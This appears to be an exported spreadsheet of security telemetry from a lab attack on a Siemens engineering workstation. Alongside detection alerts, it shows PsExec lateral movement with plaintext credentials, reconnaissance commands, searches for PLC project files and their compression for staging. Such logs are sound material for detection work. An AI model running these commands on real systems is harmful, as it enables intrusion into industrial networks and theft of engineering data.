    <t>\"C:\\Windows\\System32\\WUDFHost.exe\" -HostGUID:{193a1820-d9ac-4997-8c55-be817523f6aa} -IoEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-69603ecf-3606-43b0-86b1-41bcf192a9ff -SystemEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-df333664-4bdc-42ec-8d89-613b66eb2e4e -IoCancelEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-a1d407f4-bdcc-4bd1-b8dd-07b8d6674012 -NonStateChangingEventPortName:\\UMDFCommunicationPorts\\WUDF\\HostProcess-95c8467d-c6a3-4e76-bdbd-402260029d63 -LifetimeId:5e6b7b4f-34ce-4820-8402-f57a094e4c50 -DeviceGroupId: -HostArg:16</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:35.374</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:35.480</t>
  </si>
  <si>
    <t>rdpclip</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:35.732</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:35.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:35.941</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.034</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.166</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.285</t>
  </si>
  <si>
    <t>atbroker.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.442</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.720</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.800</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.888</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:36.908</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.048</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.082</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.158</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.264</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.470</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:37.743</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:38.091</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:38.527</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:38.634</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:38.748</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:38.863</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:38.923</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:39.113</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:39.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:39.719</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:41.531</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:43.163</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:43.239</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:43.252</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:43.423</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:48.945</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:58:50.026</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:59:02.123</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:59:02.142</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:59:02.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:59:02.357</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:59:09.139</t>
  </si>
  <si>
    <t>May 9, 2025 @ 15:59:45.454</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10013_ Global\\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-1228744127-581660863-1459446450-10013 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"  \"1\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:03.749</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:05.384</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:05.395</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:07.760</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:13.426</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:14.491</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:14.579</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:14.589</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:25.957</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:25.995</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:28.396</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:28.398</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:28.400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:39.065</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:44.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:44.927</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:44.935</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:46.669</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:46.685</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:50.359</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:50.363</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:52.776</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:00:54.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:02:15.319</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:02:15.330</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:02:15.369</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:02:15.424</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:04.829</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:07.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:07.236</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:07.243</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:07.244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:07.245</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:08.247</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:08.271</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:08.356</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:08.363</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:08.389</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:08.456</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:21.662</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:21.670</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:21.713</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.340</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.377</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.381</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.394</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.400</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.401</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.408</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:23.422</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:24.907</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:05:24.917</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:25.975</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:42.660</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:42.738</t>
  </si>
  <si>
    <t>\"LogonUI.exe\" /flags:0x0 /state0:0xa3d01055 /state1:0x41c64e6d</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:42.819</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:42.912</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:43.098</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:43.189</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:43.242</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:43.990</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:43.994</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:43.998</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:44.009</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:07:44.016</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:11:11.606</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:11:44.799</t>
  </si>
  <si>
    <t>Attack Step 4</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:15:26.012</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:15:26.015</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:15:26.122</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:15:28.136</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:15:53.969</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:15:54.015</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:09.050</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:14.213</t>
  </si>
  <si>
    <t>CommandInvocation(Invoke-WebRequest): \"Invoke-WebRequest\"  ParameterBinding(Invoke-WebRequest): name=\"Uri\"; value=\"https://download.sysinternals.com/files/PSTools.zip\"  ParameterBinding(Invoke-WebRequest): name=\"OutFile\"; value=\"C:\\Users\\Public\\PSTools4.zip\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:14.773</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:30.554</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:30.591</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.700</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.719</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.806</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.807</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.859</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.923</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.924</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.929</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:32.965</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.029</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.091</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.144</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.148</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.308</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.371</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.413</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.486</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.490</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.534</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.605</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.649</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:33.664</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:16:34.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:12.454</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:12.460</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:12.467</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\net.exe\" use \\\\10.12.25.5\\admin$ /u:Windows11EWS Windows11EWS</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:12.473</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:12.556</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:12.807</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\Windows11EWS - NTLM authentication, possible pass-the-hash attack - Possible RDP connection. Verify that WINDOWS11 is allowed to perform RDP connections</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:34.525</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:34.640</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:34.718</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS -accepteula cmd.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:34.868</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:34.961</t>
  </si>
  <si>
    <t>New Windows Service Created to start from windows root path. Suspicious event as the binary may have been dropped using Windows Admin Shares.</t>
  </si>
  <si>
    <t>[T1021.002 T1569.002]</t>
  </si>
  <si>
    <t>[Lateral Movement, Execution]</t>
  </si>
  <si>
    <t>[SMB/Windows Admin Shares, Service Execution]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:34.962</t>
  </si>
  <si>
    <t>Possible abuse of Windows admin shares by binary dropped in Windows root folder by system process</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:35.034</t>
  </si>
  <si>
    <t>Evidence of new service creation found in registry under HKLM\\System\\CurrentControlSet\\Services\\PSEXESVC\\ImagePath binary is: %%SystemRoot%%\\PSEXESVC.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:35.572</t>
  </si>
  <si>
    <t>Successful Remote Logon Detected - User:\ANONYMOUS LOGON - NTLM authentication, possible pass-the-hash attack - Possible RDP connection. Verify that WINDOWS11 is allowed to perform RDP connections</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:35.635</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\PSEXESVC.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:36.825</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:37.006</t>
  </si>
  <si>
    <t>epmap</t>
  </si>
  <si>
    <t>Possible suspicious access to Windows admin shares</t>
  </si>
  <si>
    <t>[T1021.002]</t>
  </si>
  <si>
    <t>[SMB/Windows Admin Shares]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:38.016</t>
  </si>
  <si>
    <t>Service logon event registered from non standard service account.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:38.018</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:38.028</t>
  </si>
  <si>
    <t>\"cmd.exe\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:39.034</t>
  </si>
  <si>
    <t>WINDOWS11EWS\\Windows11EWS</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:39.095</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:39.096</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:39.097</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:40.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:17:40.654</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.010</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.100</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.373</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.374</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.409</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS cmd.exe /c \"whoami &amp;amp; ipconfig /all &amp;gt; C:\\Windows\\Temp\\recon3.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.481</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.484</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.864</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.896</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:03.916</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.448</t>
  </si>
  <si>
    <t>\"cmd.exe\" /c \"whoami &amp;amp; ipconfig /all &amp;gt; C:\\Windows\\Temp\\recon3.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.497</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.498</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.500</t>
  </si>
  <si>
    <t>ipconfig  /all</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.504</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:04.648</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:05.281</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:06.138</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:37.575</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:18:37.582</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.169</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.321</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.463</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS cmd.exe /c \"dir /s /b C:\\*.ap* C:\\*.s7p C:\\*.zap* &amp;gt; C:\\Windows\\Temp\\siemens_files2.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.603</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.628</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.691</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:08.902</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:09.014</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:09.956</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:10.321</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:10.322</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:11.473</t>
  </si>
  <si>
    <t>\"cmd.exe\" /c \"dir /s /b C:\\*.ap* C:\\*.s7p C:\\*.zap* &amp;gt; C:\\Windows\\Temp\\siemens_files2.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:11.490</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:11.641</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:19:26.721</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:20:13.024</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:21:13.140</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:21:21.523</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:21:21.750</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:21:23.349</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:21:40.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:03.403</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.269</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.326</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.337</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.425</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.583</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.612</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.613</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS cmd.exe /c \"dir /s /b C:\\ProgramData\\Siemens\\Automation\\*.ap* C:\\ProgramData\\Siemens\\Automation\\*.zap* &amp;gt; C:\\Windows\\Temp\\siemens_targeted3.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.680</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:10.903</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:11.727</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:11.733</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:11.748</t>
  </si>
  <si>
    <t>\"cmd.exe\" /c \"dir /s /b C:\\ProgramData\\Siemens\\Automation\\*.ap* C:\\ProgramData\\Siemens\\Automation\\*.zap* &amp;gt; C:\\Windows\\Temp\\siemens_targeted3.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:11.755</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:12.444</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:12.492</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:22:13.021</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:44.675</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:44.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:44.773</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:44.948</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:44.981</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:44.982</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:45.026</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:45.048</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:45.176</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:45.316</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:45.317</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:46.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:46.284</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:46.296</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:46.422</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:46.726</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:23:47.393</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\System32\\SearchProtocolHost.exe\" Global\\UsGthrFltPipeMssGthrPipe4_ Global\\UsGthrCtrlFltPipeMssGthrPipe4 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:48.915</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:48.978</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.055</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS cmd.exe /c \"dir /s /b C:\\Users\\Engineer\\Documents\\Project* &amp;gt; C:\\Windows\\Temp\\project_file_list2.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.110</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.207</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.209</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.215</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.465</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:49.566</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:50.839</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:50.858</t>
  </si>
  <si>
    <t>\"cmd.exe\" /c \"dir /s /b C:\\Users\\Engineer\\Documents\\Project* &amp;gt; C:\\Windows\\Temp\\project_file_list2.txt\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:50.887</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:51.436</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:51.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:24:52.971</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:25:14.742</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:25:14.749</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:31.767</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:31.768</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:31.852</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:33.388</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:33.396</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:33.408</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.221</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.303</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.403</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.405</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.406</t>
  </si>
  <si>
    <t>\"C:\\Users\\Public\\PsTools4\\PsExec.exe\" \\\\10.12.25.5 -u Windows11EWS -p Windows11EWS powershell.exe -Command \"Compress-Archive -Path 'C:\\Users\\Engineer\\Documents\\Project Files' -DestinationPath 'C:\\Windows\\Temp\\siemens_project3.zip'\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.437</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.438</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.489</t>
  </si>
  <si>
    <t>\"powershell.exe\" -Command \"Compress-Archive -Path 'C:\\Users\\Engineer\\Documents\\Project Files' -DestinationPath 'C:\\Windows\\Temp\\siemens_project3.zip'\"</t>
  </si>
  <si>
    <t>PSEXEC was used to execute: \"powershell.exe\" -Command \"Compress-Archive -Path 'C:\\Users\\Engineer\\Documents\\Project Files' -DestinationPath 'C:\\Windows\\Temp\\siemens_project3.zip'\"</t>
  </si>
  <si>
    <t>[T1569.002]</t>
  </si>
  <si>
    <t>[Service Execution]</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.502</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.503</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.604</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.661</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:42.702</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:43.598</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:44.280</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:47.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:53.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:56.375</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:56.526</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:59.452</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:26:59.467</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:00.228</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:05.585</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:05.710</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:31.102</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:32.870</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:46.600</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:27:46.610</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:28:46.585</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:28:47.122</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:28:47.135</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:29:47.541</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:26.137</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:26.212</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:26.350</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:27.219</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:28.114</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:28.244</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:28.250</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:54.148</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:30:54.195</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:02.629</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:02.678</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:08.970</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:09.104</t>
  </si>
  <si>
    <t>May 9, 2025 @ 16:31:09.196</t>
